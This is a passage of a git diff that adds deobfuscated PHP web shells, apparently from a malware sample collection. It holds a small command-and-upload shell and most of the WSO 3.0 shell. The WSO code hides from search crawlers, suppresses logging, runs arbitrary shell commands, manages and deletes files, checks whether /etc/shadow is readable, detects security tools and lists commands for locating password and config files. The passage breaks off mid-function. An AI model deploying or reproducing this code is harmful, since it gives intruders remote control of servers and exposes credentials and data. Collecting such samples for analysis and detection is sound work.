+echo '<form method="POST" action=""><font size=2 color=#888888><b>Command</b><br><input type="text" name="cmd"><input type="Submit" name="command" value="cok"></form>';
+echo '<form enctype="multipart/form-data" action method=POST><font size=2 color=#888888><b>Upload File</b></font><br><input type=hidden name="submit"><input type=file name="userfile" size=28><br><font size=2 color=#888888><b>New name: </b></font><input type=text size=15 name="newname" class=ta><input type=submit class="bt" value="Upload"></form>';
+if(isset($_POST['submit'])){
+$uploaddir = pwd();
+if(!$name=$_POST['newname']){$name = $_FILES['userfile']['name'];};
+move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir.$name);
+if(move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir.$name)){
+echo "Upload Failed";
+} else { echo "Upload Success to ".$uploaddir.$name." Succes! "; }
+}
+if(isset($_POST['command'])){
+$cmd = $_POST['cmd'];
+echo "<pre><font size=3 color=#000000>".shell_exec($cmd)."</font></pre>";
+}
+elseif(isset($_GET['cmd'])){
+$comd = $_GET['cmd'];
+echo "<pre><font size=3 color=#000000>".shell_exec($comd)."</font></pre>";
+}
+else { echo "<pre><font size=3 color=#000000>".shell_exec('ls -la')."</font></pre>";
+}
+
+if(isset($_GET['baca'])){
+$conf = file_get_contents("../../configuration.php");
+echo $conf;
+}
+?>
\ No newline at end of file
diff --git a/Deobfuscated/WebShell_a05811ee776c0536a890dba465e501168851df6c.php b/Deobfuscated/WebShell_a05811ee776c0536a890dba465e501168851df6c.php
new file mode 100644
index 0000000..82f3f72
--- /dev/null
+++ b/Deobfuscated/WebShell_a05811ee776c0536a890dba465e501168851df6c.php
@@ -0,0 +1,1322 @@
+<?php
+$_SESSION[$_SERVER['HTTP_HOST']] = true;
+$color = "#df5"; //Colour
+$default_action = "FilesMan";
+$default_charset = "Windows-1251";
+if (!empty($_SERVER['HTTP_USER_AGENT'])) {
+    $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
+    foreach ($userAgents as $agent) if (strpos($_SERVER['HTTP_USER_AGENT'], $agent) !== false) {
+        header('HTTP/1.0 404 Not Found');
+        exit;
+    }
+}
+@session_start();
+@error_reporting(0);
+@ini_set('error_log', NULL);
+@ini_set('log_errors', 0);
+@ini_set('max_execution_time', 0);
+@set_time_limit(0);
+@set_magic_quotes_runtime(0);
+@define('VERSION', '3.0');
+if (get_magic_quotes_gpc()) {
+    function WSOstripslashes($array) {
+        return is_array($array) ? array_map('WSOstripslashes', $array) : stripslashes($array);
+    }
+    $_POST = WSOstripslashes($_POST);
+}
+if (strtolower(substr(PHP_OS, 0, 3)) == "win") $os = 'win';
+else $os = 'nix';
+$safe_mode = @ini_get('safe_mode');
+$disable_functions = @ini_get('disable_functions');
+$home_cwd = @getcwd();
+if (isset($_POST['c'])) @chdir($_POST['c']);
+$cwd = @getcwd();
+if ($os == 'win') {
+    $home_cwd = str_replace("\", " / ", $home_cwd);
+	$cwd = str_replace("\", " / ", $cwd);
+}
+if( $cwd[strlen($cwd) - 1] != '/' )
+	$cwd .= '/';
+
+if($os == 'win')
+	$aliases = array(
+		"ListDirectory" => "dir",
+    	"Findindex . phpincurrentdir" => "dir / s / w / bindex . php",
+    	"Find * config * . phpincurrentdir" => "dir / s / w / b * config * . php",
+    	"Showactiveconnections" => "netstat - an",
+    	"Showrunningservices" => "netstart",
+    	"Useraccounts" => "netuser",
+    	"Showcomputers" => "netview",
+		"ARPTable" => "arp - a",
+		"IPConfiguration" => "ipconfig / all"
+	);
+else
+	$aliases = array(
+  		"Listdir" => "ls - lha",
+		"listfileattributesonaLinuxsecondextendedfilesystem" => "lsattr - va",
+  		"showopenedports" => "netstat - an | grep - ilisten",
+		"Find" => "",
+  		"findallsuidfiles" => "find / -typef - perm - 04000 - ls",
+  		"findsuidfilesincurrentdir" => "find . -typef - perm - 04000 - ls",
+  		"findallsgidfiles" => "find / -typef - perm - 02000 - ls",
+  		"findsgidfilesincurrentdir" => "find . -typef - perm - 02000 - ls",
+  		"findconfig . inc . phpfiles" => "find / -typef - nameconfig . inc . php",
+  		"findconfig * files" => "find / -typef - name\"config*\"", "find config* files in current dir" => "find . -type f -name \"config*\"", "find all writable folders and files" => "find / -perm -2 -ls", "find all writable folders and files in current dir" => "find . -perm -2 -ls", "find all service.pwd files" => "find / -type f -name service.pwd", "find service.pwd files in current dir" => "find . -type f -name service.pwd", "find all .htpasswd files" => "find / -type f -name .htpasswd", "find .htpasswd files in current dir" => "find . -type f -name .htpasswd", "find all .bash_history files" => "find / -type f -name .bash_history", "find .bash_history files in current dir" => "find . -type f -name .bash_history", "find all .fetchmailrc files" => "find / -type f -name .fetchmailrc", "find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc", "Locate" => "", "locate httpd.conf files" => "locate httpd.conf", "locate vhosts.conf files" => "locate vhosts.conf", "locate proftpd.conf files" => "locate proftpd.conf", "locate psybnc.conf files" => "locate psybnc.conf", "locate my.conf files" => "locate my.conf", "locate admin.php files" => "locate admin.php", "locate cfg.php files" => "locate cfg.php", "locate conf.php files" => "locate conf.php", "locate config.dat files" => "locate config.dat", "locate config.php files" => "locate config.php", "locate config.inc files" => "locate config.inc", "locate config.inc.php" => "locate config.inc.php", "locate config.default.php files" => "locate config.default.php", "locate config* files " => "locate config", "locate .conf files" => "locate '.conf'", "locate .pwd files" => "locate '.pwd'", "locate .sql files" => "locate '.sql'", "locate .htpasswd files" => "locate '.htpasswd'", "locate .bash_history files" => "locate '.bash_history'", "locate .mysql_history files" => "locate '.mysql_history'", "locate .fetchmailrc files" => "locate '.fetchmailrc'", "locate backup files" => "locate backup", "locate dump files" => "locate dump", "locate priv files" => "locate priv");
+    function wsoHeader() {
+        if (empty($_POST['charset'])) $_POST['charset'] = $GLOBALS['default_charset'];
+        global $color;
+        echo "<html><head><meta http-equiv='Content-Type' content='text/html; charset=" . $_POST['charset'] . "'><title>" . $_SERVER['HTTP_HOST'] . "- WSO [Black-ID] " . VERSION . "</title>
+<style>
+body{background-color:#444;color:#e1e1e1;}
+body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; }
+table.info{ color:#fff;background-color:#222; }
+span,h1,a{ color: $color !important; }
+span{ font-weight: bolder; }
+h1{ border-left:5px solid $color;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; }
+div.content{ padding: 5px;margin-left:5px;background-color:#333; }
+a{ text-decoration:none; }
+a:hover{ text-decoration:underline; }
+.ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; }
+.bigarea{ width:100%;height:250px; }
+input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid $color; font: 9pt Monospace,'Courier New'; }
+form{ margin:0px; }
+#toolsTbl{ text-align:center; }
+.toolsInp{ width: 300px }
+.main th{text-align:left;background-color:#5e5e5e;}
+.main tr:hover{background-color:#5e5e5e}
+.l1{background-color:#444}
+pre{font-family:Courier,Monospace;}
+</style>
+<script>
+    var c_ = '" . htmlspecialchars($GLOBALS['cwd']) . "';
+    var a_ = '" . htmlspecialchars(@$_POST['a']) . "'
+    var charset_ = '" . htmlspecialchars(@$_POST['charset']) . "';
+    var p1_ = '" . ((strpos(@$_POST['p1'], "
+") !== false) ? '' : addslashes(htmlspecialchars($_POST['p1']))) . "';
+    var p2_ = '" . ((strpos(@$_POST['p2'], "
+") !== false) ? '' : addslashes(htmlspecialchars(@$_POST['p2']))) . "';
+    var p3_ = '" . ((strpos(@$_POST['p3'], "
+") !== false) ? '' : addslashes(htmlspecialchars(@$_POST['p3']))) . "';
+	function set(a,c,p1,p2,p3,charset) {
+		if(a != null)document.mf.a.value=a;else document.mf.a.value=a_;
+		if(c != null)document.mf.c.value=c;else document.mf.c.value=c_;
+		if(p1 != null)document.mf.p1.value=p1;else document.mf.p1.value=p1_;
+		if(p2 != null)document.mf.p2.value=p2;else document.mf.p2.value=p2_;
+		if(p3 != null)document.mf.p3.value=p3;else document.mf.p3.value=p3_;
+		if(charset != null)document.mf.charset.value=charset;else document.mf.charset.value=charset_;
+	}
+	function g(a,c,p1,p2,p3,charset) {
+		set(a,c,p1,p2,p3,charset);
+		document.mf.submit();
+	}
+	function a(a,c,p1,p2,p3,charset) {
+		set(a,c,p1,p2,p3,charset);
+		var params = 'ajax=true';
+		for(i=0;i<document.mf.elements.length;i++)
+			params += '&'+document.mf.elements[i].name+'='+encodeURIComponent(document.mf.elements[i].value);
+		sr('" . addslashes($_SERVER['REQUEST_URI']) . "', params);
+	}
+	function sr(url, params) {
+		if (window.XMLHttpRequest)
+			req = new XMLHttpRequest();
+		else if (window.ActiveXObject)
+			req = new ActiveXObject('Microsoft.XMLHTTP');
+        if (req) {
+            req.onreadystatechange = processReqChange;
+            req.open('POST', url, true);
+            req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded');
+            req.send(params);
+        }
+	}
+	function processReqChange() {
+		if( (req.readyState == 4) )
+			if(req.status == 200) {
+				var reg = new RegExp(\"(\d+)([\S\s]*)\", 'm');
+				var arr=reg.exec(req.responseText);
+				eval(arr[2].substr(0, arr[1]));
+			} else alert('Request error!');
+	}
+</script>
+<head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'>
+<form method=post name=mf style='display:none;'>
+<input type=hidden name=a>
+<input type=hidden name=c>
+<input type=hidden name=p1>
+<input type=hidden name=p2>
+<input type=hidden name=p3>
+<input type=hidden name=charset>
+</form>";
+        $freeSpace = @diskfreespace($GLOBALS['cwd']);
+        $totalSpace = @disk_total_space($GLOBALS['cwd']);
+        $totalSpace = $totalSpace ? $totalSpace : 1;
+        $release = @php_uname('r');
+        $kernel = @php_uname('s');
+        $exdblink = 'http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=';
+        if (strpos('Linux', $kernel) !== false) $exdblink.= urlencode('Linux Kernel ' . substr($release, 0, 6));
+        else $exdblink.= urlencode($kernel . ' ' . substr($release, 0, 3));
+        if (!function_exists('posix_getegid')) {
+            $user = @get_current_user();
+            $uid = @getmyuid();
+            $gid = @getmygid();
+            $group = "?";
+        } else {
+            $uid = @posix_getpwuid(@posix_geteuid());
+            $gid = @posix_getgrgid(@posix_getegid());
+            $user = $uid['name'];
+            $uid = $uid['uid'];
+            $group = $gid['name'];
+            $gid = $gid['gid'];
+        }
+        $cwd_links = '';
+        $path = explode("/", $GLOBALS['cwd']);
+        $n = count($path);
+        for ($i = 0;$i < $n - 1;$i++) {
+            $cwd_links.= "<a href='#' onclick='g(\"FilesMan\",\"";
+            for ($j = 0;$j <= $i;$j++) $cwd_links.= $path[$j] . '/';
+            $cwd_links.= "\")'>" . $path[$i] . "/</a>";
+        }
+        $charsets = array('UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866');
+        $opt_charsets = '';
+        foreach ($charsets as $item) $opt_charsets.= '<option value="' . $item . '" ' . ($_POST['charset'] == $item ? 'selected' : '') . '>' . $item . '</option>';
+        $m = array('Sec. Info' => 'SecInfo', 'Files' => 'FilesMan', 'Console' => 'Console', 'Mass' => 'Mass', 'Domains' => 'Domain', 'Sql' => 'Sql', 'Safe mode' => 'SafeMode', 'String tools' => 'StringTools', 'Network' => 'Network');
+        $m['Self remove'] = 'SelfRemove';
+        $menu = '';
+        foreach ($m as $k => $v) $menu.= '<th width="' . (int)(100 / count($m)) . '%">[<a href="#" onclick="g(\'' . $v . '\',null,\'\',\'\',\'\')">' . $k . '</a>]</th>';
+        $drives = "";
+        if ($GLOBALS['os'] == 'win') {
+            foreach (range('c', 'z') as $drive) if (is_dir($drive . ':\'))
+			$drives .= ' < ahref = "#"onclick = "g(\'FilesMan\',\''.$drive.':/\')" > ['.$drive.'] < / a > ';
+	}
+	echo ' < tableclass = infocellpadding = 3cellspacing = 0width = 100 % > < tr > < tdwidth = 1 > < span > Uname: < br > User: < br > Php: < br > Hdd: < br > Cwd:
+                                '.($GLOBALS['os'] == 'win'?' < br > Drives:
+                                    ':'').' < / span > < / td > '.
+		 ' < td > < nobr > '.substr(@php_uname(), 0, 120).' < ahref = "http://www.google.com/search?q='.urlencode(@php_uname()).'"target = "_blank" > [Google] < / a > < ahref = "'.$exdblink.'"target = _blank > [Exploit - DB] < / a > < / nobr > < br > '.$uid.'('.$user.') < span > Group: < / span > '.$gid.'('.$group.') < br > '.@phpversion().' < span > Safemode: < / span > '.($GLOBALS['safe_mode']?' < fontcolor = red > ON < / font > ':' < fontcolor = #00bb00><b>OFF</b></font>').' <a href=# onclick="g(\'Php\',null,\'\',\'info\')">[ phpinfo ]</a> <span>Datetime:</span> '.date('Y-m-d H:i:s').'<br>'.wsoViewSize($totalSpace).' <span>Free:</span> '.wsoViewSize($freeSpace).' ('.(int)($freeSpace/$totalSpace*100).'%)<br>'.$cwd_links.' '.wsoPermsColor($GLOBALS['cwd']).' <a href=# onclick="g(\'FilesMan\',\''.$GLOBALS['home_cwd'].'\',\'\',\'\',\'\')">[ home ]</a><br>'.$drives.'</td>'.
+                                            '<td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset">' . $opt_charsets . '</optgroup></select><br><span>Server IP:</span><br>' . @$_SERVER["SERVER_ADDR"] . '<br><span>Client IP:</span><br>' . $_SERVER['REMOTE_ADDR'] . '<br><a href="http://www.bing.com/search?q=ip:' . @$_SERVER["SERVER_ADDR"] . '" target=_blank>[ Bing ]</a> | <a href="http://www.zone-h.org/archive/ip=' . @$_SERVER["SERVER_ADDR"] . '" target=_blank>[ Zone-H ]</a><br></nobr></td></tr></table>' . '<table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr>' . $menu . '</tr></table><div style="margin:5">';
+                                        }
+                                        function wsoFooter() {
+                                            $is_writable = is_writable($GLOBALS['cwd']) ? "<font color=green>[ Writeable ]</font>" : "<font color=red>[ Not writable ]</font>";
+                                            echo "
+</div>
+<table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100%  style='border-top:2px solid #333;border-bottom:2px solid #333;'>
+	<tr>
+		<td><form onsubmit='g(null,this.c.value);return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='" . htmlspecialchars($GLOBALS['cwd']) . "'><input type=submit value='>>'></form></td>
+		<td><form onsubmit=\"g('FilesTools',null,this.f.value);return false;\"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td>
+	</tr><tr>
+		<td><form onsubmit=\"g('FilesMan',null,'mkdir',this.d.value);return false;\"><span>Make dir:</span><br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form>$is_writable</td>
+		<td><form onsubmit=\"g('FilesTools',null,this.f.value,'mkfile');return false;\"><span>Make file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form>$is_writable</td>
+	</tr><tr>
+		<td><form onsubmit=\"g('Console',null,this.c.value);return false;\"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td>
+		<td><form method='post' ENCTYPE='multipart/form-data'>
+		<input type=hidden name=a value='FilesMAn'>
+		<input type=hidden name=c value='" . $GLOBALS['cwd'] . "'>
+		<input type=hidden name=p1 value='uploadFile'>
+		<input type=hidden name=charset value='" . (isset($_POST['charset']) ? $_POST['charset'] : '') . "'>
+		<span>Upload file:</span><br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form>$is_writable</td>
+	</tr></table></div></body></html>";
+                                        }
+                                        if (!function_exists("posix_getpwuid") && (strpos($GLOBALS['disable_functions'], 'posix_getpwuid') === false)) {
+                                            function posix_getpwuid($p) {
+                                                return false;
+                                            }
+                                        }
+                                        if (!function_exists("posix_getgrgid") && (strpos($GLOBALS['disable_functions'], 'posix_getgrgid') === false)) {
+                                            function posix_getgrgid($p) {
+                                                return false;
+                                            }
+                                        }
+                                        function wsoEx($in) {
+                                            $out = '';
+                                            if (function_exists('exec')) {
+                                                @exec($in, $out);
+                                                $out = @join("
+", $out);
+                                            } elseif (function_exists('passthru')) {
+                                                ob_start();
+                                                @passthru($in);
+                                                $out = ob_get_clean();
+                                            } elseif (function_exists('system')) {
+                                                ob_start();
+                                                @system($in);
+                                                $out = ob_get_clean();
+                                            } elseif (function_exists('shell_exec')) {
+                                                $out = shell_exec($in);
+                                            } elseif (is_resource($f = @popen($in, "r"))) {
+                                                $out = "";
+                                                while (!@feof($f)) $out.= fread($f, 1024);
+                                                pclose($f);
+                                            }
+                                            return $out;
+                                        }
+                                        function wsoViewSize($s) {
+                                            if ($s >= 1073741824) return sprintf('%1.2f', $s / 1073741824) . ' GB';
+                                            elseif ($s >= 1048576) return sprintf('%1.2f', $s / 1048576) . ' MB';
+                                            elseif ($s >= 1024) return sprintf('%1.2f', $s / 1024) . ' KB';
+                                            else return $s . ' B';
+                                        }
+                                        function wsoPerms($p) {
+                                            if (($p & 0xC000) == 0xC000) $i = 's';
+                                            elseif (($p & 0xA000) == 0xA000) $i = 'l';
+                                            elseif (($p & 0x8000) == 0x8000) $i = '-';
+                                            elseif (($p & 0x6000) == 0x6000) $i = 'b';
+                                            elseif (($p & 0x4000) == 0x4000) $i = 'd';
+                                            elseif (($p & 0x2000) == 0x2000) $i = 'c';
+                                            elseif (($p & 0x1000) == 0x1000) $i = 'p';
+                                            else $i = 'u';
+                                            $i.= (($p & 0x0100) ? 'r' : '-');
+                                            $i.= (($p & 0x0080) ? 'w' : '-');
+                                            $i.= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x') : (($p & 0x0800) ? 'S' : '-'));
+                                            $i.= (($p & 0x0020) ? 'r' : '-');
+                                            $i.= (($p & 0x0010) ? 'w' : '-');
+                                            $i.= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x') : (($p & 0x0400) ? 'S' : '-'));
+                                            $i.= (($p & 0x0004) ? 'r' : '-');
+                                            $i.= (($p & 0x0002) ? 'w' : '-');
+                                            $i.= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x') : (($p & 0x0200) ? 'T' : '-'));
+                                            return $i;
+                                        }
+                                        function wsoPermsColor($f) {
+                                            if (!@is_readable($f)) return '<font color=#FF0000>' . wsoPerms(@fileperms($f)) . '</font>';
+                                            elseif (!@is_writable($f)) return '<font color=white>' . wsoPerms(@fileperms($f)) . '</font>';
+                                            else return '<font color=#00BB00>' . wsoPerms(@fileperms($f)) . '</font>';
+                                        }
+                                        if (!function_exists("scandir")) {
+                                            function scandir($dir) {
+                                                $dh = opendir($dir);
+                                                while (false !== ($filename = readdir($dh))) {
+                                                    $files[] = $filename;
+                                                }
+                                                return $files;
+                                            }
+                                        }
+                                        function wsoWhich($p) {
+                                            $path = wsoEx('which ' . $p);
+                                            if (!empty($path)) return $path;
+                                            return false;
+                                        }
+                                        function actionSecInfo() {
+                                            wsoHeader();
+                                            echo '<h1>Server security information</h1><div class=content>';
+                                            function wsoSecParam($n, $v) {
+                                                $v = trim($v);
+                                                if ($v) {
+                                                    echo '<span>' . $n . ': </span>';
+                                                    if (strpos($v, "
+") === false) echo $v . '<br>';
+                                                    else echo '<pre class=ml1>' . $v . '</pre>';
+                                                }
+                                            }
+                                            wsoSecParam('Server software', @getenv('SERVER_SOFTWARE'));
+                                            wsoSecParam('Disabled PHP Functions', $GLOBALS['disable_functions'] ? $GLOBALS['disable_functions'] : 'none');
+                                            wsoSecParam('Open base dir', @ini_get('open_basedir'));
+                                            wsoSecParam('Safe mode exec dir', @ini_get('safe_mode_exec_dir'));
+                                            wsoSecParam('Safe mode include dir', @ini_get('safe_mode_include_dir'));
+                                            wsoSecParam('cURL support', function_exists('curl_version') ? 'enabled' : 'no');
+                                            $temp = array();
+                                            if (function_exists('mysql_get_client_info')) $temp[] = "MySql (" . mysql_get_client_info() . ")";
+                                            if (function_exists('mssql_connect')) $temp[] = "MSSQL";
+                                            if (function_exists('pg_connect')) $temp[] = "PostgreSQL";
+                                            if (function_exists('oci_connect')) $temp[] = "Oracle";
+                                            wsoSecParam('Supported databases', implode(', ', $temp));
+                                            echo '<br>';
+                                            if ($GLOBALS['os'] == 'nix') {
+                                                $userful = array('gcc', 'lcc', 'cc', 'ld', 'make', 'php', 'perl', 'python', 'ruby', 'tar', 'gzip', 'bzip', 'bzip2', 'nc', 'locate', 'suidperl');
+                                                $danger = array('kav', 'nod32', 'bdcored', 'uvscan', 'sav', 'drwebd', 'clamd', 'rkhunter', 'chkrootkit', 'iptables', 'ipfw', 'tripwire', 'shieldcc', 'portsentry', 'snort', 'ossec', 'lidsadm', 'tcplodg', 'sxid', 'logcheck', 'logwatch', 'sysmask', 'zmbscap', 'sawmill', 'wormscan', 'ninja');
+                                                $downloaders = array('wget', 'fetch', 'lynx', 'links', 'curl', 'get', 'lwp-mirror');
+                                                wsoSecParam('Readable /etc/passwd', @is_readable('/etc/passwd') ? "yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"passwd\")'>[view]</a>" : 'no');
+                                                wsoSecParam('Readable /etc/shadow', @is_readable('/etc/shadow') ? "yes <a href='#' onclick='g(\"FilesTools\", \"etc\", \"shadow\")'>[view]</a>" : 'no');
+                                                wsoSecParam('OS version', @file_get_contents('/proc/version'));
+                                                wsoSecParam('Distr name', @file_get_contents('/etc/issue.net'));
+                                                if (!$GLOBALS['safe_mode']) {
+                                                    echo '<br>';
+                                                    $temp = array();
+                                                    foreach ($userful as $item) if (wsoWhich($item)) {
+                                                        $temp[] = $item;
+                                                    }
+                                                    wsoSecParam('Userful', implode(', ', $temp));
+                                                    $temp = array();
+                                                    foreach ($danger as $item) if (wsoWhich($item)) {
+                                                        $temp[] = $item;
+                                                    }
+                                                    wsoSecParam('Danger', implode(', ', $temp));
+                                                    $temp = array();
+                                                    foreach ($downloaders as $item) if (wsoWhich($item)) {
+                                                        $temp[] = $item;
+                                                    }
+                                                    wsoSecParam('Downloaders', implode(', ', $temp));
+                                                    echo '<br/>';
+                                                    wsoSecParam('HDD space', wsoEx('df -h'));
+                                                    wsoSecParam('Hosts', @file_get_contents('/etc/hosts'));
+                                                }
+                                            } else {
+                                                wsoSecParam('OS Version', wsoEx('ver'));
+                                                wsoSecParam('Account Settings', wsoEx('net accounts'));
+                                                wsoSecParam('User Accounts', wsoEx('net user'));
+                                            }
+                                            echo '</div>';
+                                            wsoFooter();
+                                        }
+                                        function actionFilesMan() {
+                                            wsoHeader();
+                                            echo '<h1>File manager</h1><div class=content><script>p1_=p2_=p3_="";</script>';
+                                            if (!empty($_POST['p1'])) {
+                                                switch ($_POST['p1']) {
+                                                    case 'uploadFile':
+                                                        if (!@move_uploaded_file($_FILES['f']['tmp_name'], $_FILES['f']['name'])) echo "Can't upload file!";
+                                                        break;
+                                                    case 'mkdir':
+                                                        if (!@mkdir($_POST['p2'])) echo "Can't create new dir";
+                                                        break;
+                                                    case 'delete':
+                                                        function deleteDir($path) {
+                                                            $path = (substr($path, -1) == '/') ? $path : $path . '/';
+                                                            $dh = opendir($path);
+                                                            while (($item = readdir($dh)) !== false) {
+                                                                $item = $path . $item;
+                                                                if ((basename($item) == "..") || (basename($item) == ".")) continue;
+                                                                $type = filetype($item);
+                                                                if ($type == "dir") deleteDir($item);
+                                                                else @unlink($item);
+                                                            }
+                                                            closedir($dh);
+                                                            rmdir($path);
+                                                        }
+                                                        if (is_array(@$_POST['f'])) foreach ($_POST['f'] as $f) {
+                                                            $f = urldecode($f);
+                                                            if (is_dir($f)) deleteDir($f);
+                                                            else @unlink($f);
+                                                        }
+                                                        break;
+                                                    case 'paste':
+                                                        if ($_SESSION['act'] == 'copy') {
+                                                            function copy_paste($c, $s, $d) {
+                                                                if (is_dir($c . $s)) {
+                                                                    mkdir($d . $s);
+                                                                    $h = @opendir($c . $s);
+                                                                    while (($f = @readdir($h)) !== false) if (($f != ".") and ($f != "..")) {
+                                                                        copy_paste($c . $s . '/', $f, $d . $s . '/');
+                                                                    }
+                                                                } elseif (is_file($c . $s)) {
+                                                                    @copy($c . $s, $d . $s);
+                                                                }
+                                                            }
+                                                            foreach ($_SESSION['f'] as $f) copy_paste($_SESSION['c'], $f, $GLOBALS['cwd']);
+                                                        } elseif ($_SESSION['act'] == 'move') {
+                                                            function move_paste($c, $s, $d) {
+                                                                if (is_dir($c . $s)) {
+                                                                    mkdir($d . $s);
+                                                                    $h = @opendir($c . $s);
+                                                                    while (($f = @readdir($h)) !== false) if (($f != ".") and ($f != "..")) {
+                                                                        copy_paste($c . $s . '/', $f, $d . $s . '/');
+                                                                    }
+                                                                } elseif (@is_file($c . $s)) {
+                                                                    @copy($c . $s, $d . $s);
+                                                                }
+                                                            }
+                                                            foreach ($_SESSION['f'] as $f) @rename($_SESSION['c'] . $f, $GLOBALS['cwd'] . $f);
+                                                        } elseif ($_SESSION['act'] == 'zip') {
+                                                            if (class_exists('ZipArchive')) {
+                                                                $zip = new ZipArchive();
+                                                                if ($zip->open('wso_' . date("Ymd_His") . '.zip', (int)eval('return ZIPARCHIVE::CREATE;'))) {
+                                                                    chdir($_SESSION['c']);
+                                                                    foreach ($_SESSION['f'] as $f) {
+                                                                        if (@is_file($_SESSION['c'] . $f)) $zip->addFile($_SESSION['c'] . $f, $f);
+                                                                        elseif (@is_dir($_SESSION['c'] . $f)) {
+                                                                            $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f . '/'));
+                                                                            foreach ($iterator as $key => $value) {
+                                                                                $zip->addFile(realpath($key), $key);
+                                                                            }
+                                                                        }
+                                                                    }
+                                                                    chdir($GLOBALS['cwd']);
+                                                                    $zip->close();
+                                                                }
+                                                            }
+                                                        } elseif ($_SESSION['act'] == 'unzip') {
+                                                            if (class_exists('ZipArchive')) {
+                                                                $zip = new ZipArchive();
+                                                                foreach ($_SESSION['f'] as $f) {
+                                                                    if ($zip->open($_SESSION['c'] . $f)) {
+                                                                        $zip->extractTo($GLOBALS['cwd']);
+                                                                        $zip->close();
+                                                                    }
+                                                                }
+                                                            }
+                                                        }
+                                                        unset($_SESSION['f']);
+                                                        break;
+                                                    default:
+                                                        if (!empty($_POST['p1']) && (($_POST['p1'] == 'copy') || ($_POST['p1'] == 'move') || ($_POST['p1'] == 'zip') || ($_POST['p1'] == 'unzip'))) {
+                                                            $_SESSION['act'] = @$_POST['p1'];
+                                                            $_SESSION['f'] = @$_POST['f'];
+                                                            foreach ($_SESSION['f'] as $k => $f) $_SESSION['f'][$k] = urldecode($f);
+                                                            $_SESSION['c'] = @$_POST['c'];
+                                                        }
+                                                        break;
+                                                    }
+                                                }
+                                                $dirContent = @scandir(isset($_POST['c']) ? $_POST['c'] : $GLOBALS['cwd']);
+                                                if ($dirContent === false) {
+                                                    echo 'Can\'t open this folder!';
+                                                    wsoFooter();
+                                                    return;
+                                                }
+                                                global $sort;
+                                                $sort = array('name', 1);
+                                                if (!empty($_POST['p1'])) {
+                                                    if (preg_match('!s_([A-z]+)_(\d{1})!', $_POST['p1'], $match)) $sort = array($match[1], (int)$match[2]);
+                                                }
+                                                echo "<script>
+	function sa() {
+		for(i=0;i<document.files.elements.length;i++)
+			if(document.files.elements[i].type == 'checkbox')
+				document.files.elements[i].checked = document.files.elements[0].checked;
+	}
+</script>
+<table width='100%' class='main' cellspacing='0' cellpadding='2'>
+<form name=files method=post><tr><th width='13px'><input type=checkbox onclick='sa()' class=chkbx></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_name_" . ($sort[1] ? 0 : 1) . "\")'>Name</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_size_" . ($sort[1] ? 0 : 1) . "\")'>Size</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_modify_" . ($sort[1] ? 0 : 1) . "\")'>Modify</a></th><th>Owner/Group</th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_perms_" . ($sort[1] ? 0 : 1) . "\")'>Permissions</a></th><th>Actions</th></tr>";
+                                                $dirs = $files = array();
+                                                $n = count($dirContent);
+                                                for ($i = 0;$i < $n;$i++) {
+                                                    $ow = @posix_getpwuid(@fileowner($dirContent[$i]));
+                                                    $gr = @posix_getgrgid(@filegroup($dirContent[$i]));
+                                                    $tmp = array('name' => $dirContent[$i], 'path' => $GLOBALS['cwd'] . $dirContent[$i], 'modify' => date('Y-m-d H:i:s', @filemtime($GLOBALS['cwd'] . $dirContent[$i])), 'perms' => wsoPermsColor($GLOBALS['cwd'] . $dirContent[$i]), 'size' => @filesize($GLOBALS['cwd'] . $dirContent[$i]), 'owner' => $ow['name'] ? $ow['name'] : @fileowner($dirContent[$i]), 'group' => $gr['name'] ? $gr['name'] : @filegroup($dirContent[$i]));
+                                                    if (@is_file($GLOBALS['cwd'] . $dirContent[$i])) $files[] = array_merge($tmp, array('type' => 'file'));
+                                                    elseif (@is_link($GLOBALS['cwd'] . $dirContent[$i])) $dirs[] = array_merge($tmp, array('type' => 'link'));
+                                                    elseif (@is_dir($GLOBALS['cwd'] . $dirContent[$i]) && ($dirContent[$i] != ".")) $dirs[] = array_merge($tmp, array('type' => 'dir'));
+                                                }
+                                                $GLOBALS['sort'] = $sort;
+                                                function wsoCmp($a, $b) {
+                                                    if ($GLOBALS['sort'][0] != 'size') return strcmp(strtolower($a[$GLOBALS['sort'][0]]), strtolower($b[$GLOBALS['sort'][0]])) * ($GLOBALS['sort'][1] ? 1 : -1);
+                                                    else return (($a['size'] < $b['size']) ? -1 : 1) * ($GLOBALS['sort'][1] ? 1 : -1);
+                                                }
+                                                usort($files, "wsoCmp");
+                                                usort($dirs, "wsoCmp");
+                                                $files = array_merge($dirs, $files);
+                                                $l = 0;
+                                                foreach ($files as $f) {
